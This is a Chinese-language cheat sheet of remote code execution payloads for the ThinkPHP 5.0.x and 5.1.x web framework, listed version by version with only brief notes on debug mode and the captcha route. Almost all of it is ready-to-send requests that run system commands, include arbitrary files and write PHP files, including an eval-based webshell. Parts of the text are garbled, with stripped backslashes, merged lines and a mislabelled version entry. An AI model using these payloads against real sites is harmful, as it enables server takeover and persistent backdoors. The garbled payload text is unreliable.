thinkphp5最出名的就是rce,rce有两个大版本的分别
- ThinkPHP 5.0-5.0.24
- ThinkPHP 5.1.0-5.1.30
因为漏洞触发点和版本的不同,导致payload分为多种,其中一些payload需要取决于debug选项比如直接访问路由触发的
5.1.x :
?s=index/thinkRequest/input&filter[]=system&data=pwd
?s=index/thinkviewdriverPhp/display&content=<?php phpinfo();?>
?s=index/thinktemplatedriverfile/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id5.0.x :
?s=index/thinkconfig/get&name=database.username # 获取配置信息
?s=index/thinkLang/load&file=../../test.jpg # 包含任意文件
?s=index/thinkConfig/load&file=../../t.php # 包含任意.php文件
?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index|thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami还有一种
http://php.local/thinkphp5.0.5/public/index.php?s=index
post
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
_method=__construct&filter[]=system&method=GET&get[]=whoami
# ThinkPHP <= 5.0.13
POST /?s=index/index
s=whoami&_method=__construct&method=&filter[]=system
# ThinkPHP <= 5.0.23、5.1.0 <= 5.1.16 需要开启框架app_debug
POST /
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al
# ThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captcha
POST /?s=xxx HTTP/1.1
_method=__construct&filter[]=system&method=get&get[]=ls+-al
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls5.0debug 无关命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
5.0.1debug 无关命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert5.0.2命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
5.0.3debug 无关命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
5.0.4debug 无关命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
5.0.5debug 无关命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
5.0.6
debug 无关命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
5.0.7
debug 无关命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
5.0.8
debug 无关命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami c=system&f=calc&_method=filter 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
5.0.9
debug 无关命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami c=system&f=calc&_method=filter 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
_method=__construct&filter[]=assert&method=get&get[]=file_put_contents(‘a.php’,'<?php eval($_POST[a])?>’)
5.0.10
从5.0.10开始默认debug=false,debug无关命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami c=system&f=calc&_method=filter 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
5.0.11
默认debug=false,debug无关命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami c=system&f=calc&_method=filter 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
5.0.12
默认debug=false,debug无关命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami c=system&f=calc&_method=filter 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
5.0.13
默认debug=false,需要开启debug命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami c=system&f=calc&_method=filter 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
那有没有别的办法不开debug直接rce呢?和debug的原理一样,switch的时候进入module分支会被覆盖,那就进入到其他的分支。
在thinkphp5完整版中官网揉进去了一个验证码的路由,可以通过这个路由触发rce这个是我在
5.0.13
下试出来的payload
“topthink/think-captcha”: “^1.0″POST ?s=captcha/calc _method=__construct&filter[]=system&method=GET
我们继续5.0.13补充补充有captcha路由时无需debug=true
POST ?s=captcha/calc _method=__construct&filter[]=system&method=GET
5.0.14
默认debug=false,需要开启debug命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami c=system&f=calc&_method=filter 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert 有captcha路由时无需debug=truePOST ?s=captcha/calc _method=__construct&filter[]=system&method=GET
5.0.15
默认debug=false,需要开启debug命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami c=system&f=calc&_method=filter 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert 有captcha路由时无需debug=truePOST ?s=captcha/calc _method=__construct&filter[]=system&method=GET
5.0.1
默认debug=false,需要开启debug命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami c=system&f=calc&_method=filter 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
POST ?s=captcha/calc _method=__construct&filter[]=system&method=GET
5.0.17
默认debug=false,需要开启debug命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami c=system&f=calc&_method=filter 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
POST ?s=captcha/calc _method=__construct&filter[]=system&method=GET
5.0.18
默认debug=false,需要开启debug命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami c=system&f=calc&_method=filter 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
POST ?s=captcha/calc _method=__construct&filter[]=system&method=GET
5.0.19
默认debug=false,需要开启debug命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami c=system&f=calc&_method=filter
写shell
POST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
POST ?s=captcha/calc _method=__construct&filter[]=system&method=GET
5.0.20
默认debug=false,需要开启debug命令执行
POST ?s=index/index s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__construct&method=GET&filter[]=system&get[]=whoami c=system&f=calc&_method=filter 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
POST ?s=captcha/calc _method=__construct&filter[]=system&method=GET
5.0.21
默认debug=false,需要开启debug命令执行
POST ?s=index/index _method=__construct&filter[]=system&server[REQUEST_METHOD]=calc 写shellPOST _method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents(‘Y4er.php’,'<?php phpinfo();’) 有captcha路由时无需debug=truePOST ?s=captcha/calc _method=__construct&filter[]=system&method=GET POST ?s=captcha _method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get
5.0.22
默认debug=false,需要开启debug命令执行
POST ?s=index/index _method=__construct&filter[]=system&server[REQUEST_METHOD]=calc 写shellPOST _method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)
有captcha路由时无需debug=true
POST ?s=captcha/calc _method=__construct&filter[]=system&method=GET POST ?s=captcha _method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get
5.0.23
默认debug=false,需要开启debug命令执行
POST ?s=index/index _method=__construct&filter[]=system&server[REQUEST_METHOD]=calc 写shellPOST _method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)
有captcha路由时无需debug=true
POST ?s=captcha/calc _method=__construct&filter[]=system&method=GET POST ?s=captcha _method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get
5.0.24
作为5.0.x的最后一个版本,rce被修复5.1.0默认debug为true命令执行
POST ?s=index/index _method=__construct&filter[]=system&method=GET&s=calc
写shell
POST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true”
topthink/think-captcha”: “2.*”POST ?s=captcha/calc _method=__construct&filter[]=system&method=GET POST ?s=captcha _method=__construct&filter[]=system&s=calc&method=get
5.1.1命令执行
POST ?s=index/index _method=__construct&filter[]=system&method=GET&s=calc 写shellPOST s=file_put_contents(‘Y4er.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert
有captcha路由时无需debug=true
POST ?s=captcha/calc _method=__construct&filter[]=system&method=GET POST ?s=captcha _method=__construct&filter[]=system&s=calc&method=get
至此,不再一个一个版本测了,费时费力。基于__construct的payload大部分出现在5.0.x及低版本的5.1.x中。下文分析另一种rce。未开启强制路由导致rce这种rce的payload多形如
?s=index/thinkRequest/input&filter[]=system&data=pwd ?s=index/thinkviewdriverPhp/display&content=<?php phpinfo();?> ?s=index/thinktemplatedriverfile/write&cacheFile=shell.php&content=<?php phpinfo();?> ?s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id